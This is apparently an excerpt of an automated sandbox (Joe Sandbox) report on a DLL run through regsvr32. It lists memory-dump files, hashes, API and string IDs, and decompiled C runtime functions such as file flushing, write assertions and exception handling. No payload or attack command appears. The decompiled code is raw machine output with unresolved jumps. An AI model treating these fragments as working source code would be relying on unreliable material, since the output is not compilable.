                                                                                                                                            • Instruction ID: 65363c20ec5fda74010cf79b5a473aa73cfc384a3e62b846298905f75109f48e
                                                                                                                                            • Opcode Fuzzy Hash: e5522c6252449cb40e85df54e6268dac1ebec28ce271d6c329a952fe203911e4
                                                                                                                                            • Instruction Fuzzy Hash: 07216D22A2DB99C2EB549B11E590329B3A4FBC4F90F605835EA8E477E4CF7CD494C720
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 933340387-1018135373
                                                                                                                                            • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                                                                            • Instruction ID: 20e0384da1c3b9d8f8ada7b99fba97e4fbac38af490e7e5e0e9dd0b40d917e9f
                                                                                                                                            • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                                                                                                                            • Instruction Fuzzy Hash: 7721FB3290C65AC2DAA49F19E1903AE67A0FBC4F55FA01532EA9E077E5CF3DD441CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __doserrno_invalid_parameter
                                                                                                                                            • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                                                                            • API String ID: 4140903211-23161695
                                                                                                                                            • Opcode ID: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                                                                            • Instruction ID: fe29da28bd62d2b2992f50a70721c8dc0032ed049b43c24050285c360e979a89
                                                                                                                                            • Opcode Fuzzy Hash: 943f3f5a8649ad99659fc24fe5f00fa9245fa7ab2d20795fce64249369f79773
                                                                                                                                            • Instruction Fuzzy Hash: 9A11577291C22ECAF764DF20EA5036A72A1FB80B44FA06935E24D036D4DF7DE544CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __doserrno_invalid_parameter
                                                                                                                                            • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                                                                            • API String ID: 4140903211-3042049227
                                                                                                                                            • Opcode ID: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                                                                            • Instruction ID: 6315426320b4a9a805fd983185b77a75e016525e67397d5ca8ca31cbd60a5bc9
                                                                                                                                            • Opcode Fuzzy Hash: b18c78e6a001b3924330ee466a7aa5e58f01f9920a26db0e17f8c8ea79e16f29
                                                                                                                                            • Instruction Fuzzy Hash: 5E117C32A0C66AEAEB34DF20F9013AA7350AF84B54FA05836D54C036C5CF7DD544CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __doserrno_invalid_parameter
                                                                                                                                            • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                                                                            • API String ID: 4140903211-1338331675
                                                                                                                                            • Opcode ID: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                                                                            • Instruction ID: 1a7c1cad4c9225111e61169509e3bfa1f7be5b4d4c84baefabb7d421c0be998e
                                                                                                                                            • Opcode Fuzzy Hash: f80fd563d90780f0aa1c670857feec0e10d9ec583905498dafbcab80ebad431c
                                                                                                                                            • Instruction Fuzzy Hash: 0701297290C66ED6F7249F20E9403697660AF84B54FB05935E24D036E5CF7DD544CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DecodePointer__doserrno_invalid_parameter
                                                                                                                                            • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                                                                                                                            • API String ID: 1098298932-1795423647
                                                                                                                                            • Opcode ID: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                                                                            • Instruction ID: f17bc9c77d36da257c82ddbaaaf603f2ce165a1d55e8f0d1721786e0e06ae3ee
                                                                                                                                            • Opcode Fuzzy Hash: 76c1c365018f90ed7cb3e44e1db6073c5157a9fa4c515fc26b073f11152878b0
                                                                                                                                            • Instruction Fuzzy Hash: 89E03972A0C91EE5F6209F20E8113AA2210AF84B08FE00532D04C072D6CF7DA605C761
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 20%
                                                                                                                                            			E00007FFC7FFC65D0FF00(intOrPtr __ecx, intOrPtr _a8) {
                                                                                                                                            				signed int _v16;
                                                                                                                                            				signed int _v20;
                                                                                                                                            				signed int _v24;
                                                                                                                                            
                                                                                                                                            				_a8 = __ecx;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				_v16 = 0;
                                                                                                                                            				0x65cf9300();
                                                                                                                                            				_v20 = 0;
                                                                                                                                            				_v20 = _v20 + 1;
                                                                                                                                            				if (_v20 -  *0x65d1e520 >= 0) goto 0x65d10042;
                                                                                                                                            				if ( *((long long*)( *0x65d1d500 + _v20 * 8)) == 0) goto 0x65d1003d;
                                                                                                                                            				if (( *( *((intOrPtr*)( *0x65d1d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0x65d1003d;
                                                                                                                                            				E00007FFC7FFC65D0AE90(_v20,  *((intOrPtr*)( *0x65d1d500 + _v20 * 8)));
                                                                                                                                            				if (( *( *((intOrPtr*)( *0x65d1d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0x65d10024;
                                                                                                                                            				if (_a8 != 1) goto 0x65d0ffe1;
                                                                                                                                            				if (E00007FFC7FFC65D0FD70( *((intOrPtr*)( *0x65d1d500 + _v20 * 8))) == 0xffffffff) goto 0x65d0ffdf;
                                                                                                                                            				_v24 = _v24 + 1;
                                                                                                                                            				goto 0x65d10024;
                                                                                                                                            				if (_a8 != 0) goto 0x65d10024;
                                                                                                                                            				if (( *( *((intOrPtr*)( *0x65d1d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0x65d10024;
                                                                                                                                            				if (E00007FFC7FFC65D0FD70( *((intOrPtr*)( *0x65d1d500 + _v20 * 8))) != 0xffffffff) goto 0x65d10024;
                                                                                                                                            				_v16 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65D0AF60(_v20,  *((intOrPtr*)( *0x65d1d500 + _v20 * 8)));
                                                                                                                                            				goto L1;
                                                                                                                                            				__ecx = 1;
                                                                                                                                            				__eax = E00007FFC7FFC65CF9360(__eax, 1);
                                                                                                                                            				if (_a8 != 1) goto 0x65d1005b;
                                                                                                                                            				__eax = _v24;
                                                                                                                                            				goto 0x65d1005f;
                                                                                                                                            				__eax = _v16;
                                                                                                                                            				return _v16;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0ff00
                                                                                                                                            0x7ffc65d0ff08
                                                                                                                                            0x7ffc65d0ff10
                                                                                                                                            0x7ffc65d0ff1d
                                                                                                                                            0x7ffc65d0ff23
                                                                                                                                            0x7ffc65d0ff33
                                                                                                                                            0x7ffc65d0ff41
                                                                                                                                            0x7ffc65d0ff58
                                                                                                                                            0x7ffc65d0ff78
                                                                                                                                            0x7ffc65d0ff92
                                                                                                                                            0x7ffc65d0ffb2
                                                                                                                                            0x7ffc65d0ffb9
                                                                                                                                            0x7ffc65d0ffd3
                                                                                                                                            0x7ffc65d0ffdb
                                                                                                                                            0x7ffc65d0ffdf
                                                                                                                                            0x7ffc65d0ffe6
                                                                                                                                            0x7ffc65d10000
                                                                                                                                            0x7ffc65d1001a
                                                                                                                                            0x7ffc65d1001c
                                                                                                                                            0x7ffc65d10038
                                                                                                                                            0x7ffc65d1003d
                                                                                                                                            0x7ffc65d10042
                                                                                                                                            0x7ffc65d10047
                                                                                                                                            0x7ffc65d10051
                                                                                                                                            0x7ffc65d10053
                                                                                                                                            0x7ffc65d10059
                                                                                                                                            0x7ffc65d1005b
                                                                                                                                            0x7ffc65d10063

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1144694634-0
                                                                                                                                            • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                                                                            • Instruction ID: 97b37c0af715426c3cb8acda770dc46f424aa8b6751d3869e66fcb145a878477
                                                                                                                                            • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                                                                                                            • Instruction Fuzzy Hash: AB41DD3690CA1AC6EB38DB19D68123963A0FB89F58F200635E65D877E4DF3DD951CA10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                            			E00007FFC7FFC65D03CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                                                            				long long _v16;
                                                                                                                                            				long long _v24;
                                                                                                                                            				intOrPtr _v32;
                                                                                                                                            				long long _v40;
                                                                                                                                            				long long _v48;
                                                                                                                                            				intOrPtr _v52;
                                                                                                                                            				intOrPtr _v56;
                                                                                                                                            				signed int _v64;
                                                                                                                                            				long long _v72;
                                                                                                                                            				char _v80;
                                                                                                                                            				long long _v88;
                                                                                                                                            				void* _t135;
                                                                                                                                            				void* _t145;
                                                                                                                                            				void* _t147;
                                                                                                                                            				void* _t148;
                                                                                                                                            				void* _t149;
                                                                                                                                            				signed int* _t200;
                                                                                                                                            				intOrPtr _t206;
                                                                                                                                            
                                                                                                                                            				_a32 = __r9;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0x65d03d6c;
                                                                                                                                            				if ( *_a8 == 0xe06d7363) goto 0x65d03d6c;
                                                                                                                                            				if ( *_a8 != 0x80000029) goto 0x65d03d2a;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0x65d03d2a;
                                                                                                                                            				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0x65d03d6c;
                                                                                                                                            				if ( *_a8 == 0x80000026) goto 0x65d03d6c;
                                                                                                                                            				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0x65d03d6c;
                                                                                                                                            				if ((_a40[9] & 0x00000001) == 0) goto 0x65d03d6c;
                                                                                                                                            				goto 0x65d0409c;
                                                                                                                                            				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0x65d03ef3;
                                                                                                                                            				if (_a40[1] == 0) goto 0x65d03ee4;
                                                                                                                                            				if (_a48 != 0) goto 0x65d03ee4;
                                                                                                                                            				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0x65d03e40;
                                                                                                                                            				if ( *_a8 != 0x80000026) goto 0x65d03e40;
                                                                                                                                            				_v56 = E00007FFC7FFC65D03A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                                                                                                                            				if (_v56 - 0xffffffff < 0) goto 0x65d03e0a;
                                                                                                                                            				if (_v56 - _a40[1] >= 0) goto 0x65d03e0a;
                                                                                                                                            				goto 0x65d03e0f;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_a40);
                                                                                                                                            				r9d = _v56;
                                                                                                                                            				E00007FFC7FFC65D04F20(_a40, _a16, _a32, _a40);
                                                                                                                                            				goto 0x65d03ec7;
                                                                                                                                            				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0x65d03ec7;
                                                                                                                                            				if ( *_a8 != 0x80000029) goto 0x65d03ec7;
                                                                                                                                            				_v48 = _a8;
                                                                                                                                            				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                                                                                                                            				if (_v52 - 0xffffffff < 0) goto 0x65d03e95;
                                                                                                                                            				if (_v52 - _a40[1] >= 0) goto 0x65d03e95;
                                                                                                                                            				goto 0x65d03e9a;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_a40);
                                                                                                                                            				r9d = _v52;
                                                                                                                                            				E00007FFC7FFC65D04F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                                                                                                                            				goto 0x65d0409c;
                                                                                                                                            				E00007FFC7FFC65CFE790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                                                                                                                            				goto 0x65d04097;
                                                                                                                                            				if (_a40[3] != 0) goto 0x65d03f59;
                                                                                                                                            				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0x65d04097;
                                                                                                                                            				_t200 = _a40;
                                                                                                                                            				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0x65d03f44;
                                                                                                                                            				_t135 = E00007FFC7FFC65CFE680( *_a40 & 0x1fffffff, _t200);
                                                                                                                                            				_v24 = _t200 + _a40[8];
                                                                                                                                            				goto 0x65d03f4d;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				if (_v24 == 0) goto 0x65d04097;
                                                                                                                                            				if ( *_a8 != 0xe06d7363) goto 0x65d04041;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0x65d04041;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0x65d04041;
                                                                                                                                            				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                                                                                                                            				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0x65d03fc5;
                                                                                                                                            				E00007FFC7FFC65CFE6A0(_t135, _t206);
                                                                                                                                            				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                                                                                                                            				goto 0x65d03fce;
                                                                                                                                            				_v16 = 0;
                                                                                                                                            				_v40 = _v16;
                                                                                                                                            				_t177 = _v40;
                                                                                                                                            				if (_v40 == 0) goto 0x65d04041;
                                                                                                                                            				_v64 = _a64 & 0x000000ff;
                                                                                                                                            				_v72 = _a56;
                                                                                                                                            				_v80 = _a48;
                                                                                                                                            				_v88 = _a40;
                                                                                                                                            				_v32 = _v40();
                                                                                                                                            				goto 0x65d04097;
                                                                                                                                            				_v64 = _a56;
                                                                                                                                            				_v72 = _a48;
                                                                                                                                            				_v80 = _a64 & 0x000000ff;
                                                                                                                                            				_v88 = _a40;
                                                                                                                                            				E00007FFC7FFC65D040B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                                                                                                                            				return 1;
                                                                                                                                            			}





















                                                                                                                                            0x7ffc65d03cc0
                                                                                                                                            0x7ffc65d03cc5
                                                                                                                                            0x7ffc65d03cca
                                                                                                                                            0x7ffc65d03ccf
                                                                                                                                            0x7ffc65d03cd8
                                                                                                                                            0x7ffc65d03ce4
                                                                                                                                            0x7ffc65d03cf8
                                                                                                                                            0x7ffc65d03d08
                                                                                                                                            0x7ffc65d03d16
                                                                                                                                            0x7ffc65d03d28
                                                                                                                                            0x7ffc65d03d38
                                                                                                                                            0x7ffc65d03d4e
                                                                                                                                            0x7ffc65d03d60
                                                                                                                                            0x7ffc65d03d67
                                                                                                                                            0x7ffc65d03d7c
                                                                                                                                            0x7ffc65d03d8e
                                                                                                                                            0x7ffc65d03d9c
                                                                                                                                            0x7ffc65d03db2
                                                                                                                                            0x7ffc65d03dc6
                                                                                                                                            0x7ffc65d03dec
                                                                                                                                            0x7ffc65d03df5
                                                                                                                                            0x7ffc65d03e06
                                                                                                                                            0x7ffc65d03e08
                                                                                                                                            0x7ffc65d03e0a
                                                                                                                                            0x7ffc65d03e0f
                                                                                                                                            0x7ffc65d03e2c
                                                                                                                                            0x7ffc65d03e3b
                                                                                                                                            0x7ffc65d03e50
                                                                                                                                            0x7ffc65d03e60
                                                                                                                                            0x7ffc65d03e6a
                                                                                                                                            0x7ffc65d03e77
                                                                                                                                            0x7ffc65d03e80
                                                                                                                                            0x7ffc65d03e91
                                                                                                                                            0x7ffc65d03e93
                                                                                                                                            0x7ffc65d03e95
                                                                                                                                            0x7ffc65d03e9a
                                                                                                                                            0x7ffc65d03eb8
                                                                                                                                            0x7ffc65d03ec2
                                                                                                                                            0x7ffc65d03edf
                                                                                                                                            0x7ffc65d03eee
                                                                                                                                            0x7ffc65d03eff
                                                                                                                                            0x7ffc65d03f15
                                                                                                                                            0x7ffc65d03f1b
                                                                                                                                            0x7ffc65d03f27
                                                                                                                                            0x7ffc65d03f29
                                                                                                                                            0x7ffc65d03f3d
                                                                                                                                            0x7ffc65d03f42
                                                                                                                                            0x7ffc65d03f44
                                                                                                                                            0x7ffc65d03f53
                                                                                                                                            0x7ffc65d03f67
                                                                                                                                            0x7ffc65d03f79
                                                                                                                                            0x7ffc65d03f8e
                                                                                                                                            0x7ffc65d03f9c
                                                                                                                                            0x7ffc65d03fa4
                                                                                                                                            0x7ffc65d03fa6
                                                                                                                                            0x7ffc65d03fbe
                                                                                                                                            0x7ffc65d03fc3
                                                                                                                                            0x7ffc65d03fc5
                                                                                                                                            0x7ffc65d03fd3
                                                                                                                                            0x7ffc65d03fd8
                                                                                                                                            0x7ffc65d03fde
                                                                                                                                            0x7ffc65d03fe8
                                                                                                                                            0x7ffc65d03ff4
                                                                                                                                            0x7ffc65d04000
                                                                                                                                            0x7ffc65d0400c
                                                                                                                                            0x7ffc65d04035
                                                                                                                                            0x7ffc65d0403f
                                                                                                                                            0x7ffc65d04049
                                                                                                                                            0x7ffc65d04055
                                                                                                                                            0x7ffc65d04061
                                                                                                                                            0x7ffc65d0406d
                                                                                                                                            0x7ffc65d04092
                                                                                                                                            0x7ffc65d040a0

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _inconsistency
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 32975420-3733052814
                                                                                                                                            • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                                                                            • Instruction ID: 78d1c500d8008c61f260c2a06a47134b3f84a85e74b922b21aa90704917ef5ec
                                                                                                                                            • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                                                                                                            • Instruction Fuzzy Hash: FEA1D93660C7D9C6D6748F19E1407AAB7A0FB85B94F604526EACD87B98CF3DD884CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 00007FFC65CF991D
                                                                                                                                            • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 00007FFC65CF9932
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __free_lconv_mon__free_lconv_num
                                                                                                                                            • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                                                                                                            • API String ID: 2148069796-2706031433
                                                                                                                                            • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                                                                            • Instruction ID: 1391c0337b837d70f92a24bd3826ce39ea0ac75b218dedb987c6895ea505a789
                                                                                                                                            • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                                                                                                            • Instruction Fuzzy Hash: 26A1072361CA89C2EF508F49E0853AAA7A0FBC8F50F655436EA8E477A5CFBDD445C710
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                                                                            • API String ID: 2123368286-3717698799
                                                                                                                                            • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                                                                            • Instruction ID: c491c731fdd3f84843533dc064edf2fc4b1fafce94cfaa8b62b5da1bbd6a497b
                                                                                                                                            • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                                                                                            • Instruction Fuzzy Hash: D281413290DB9AC5DA748F24E94436A73A0FB85B68F200A35E6AD437D9DF3CD045CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
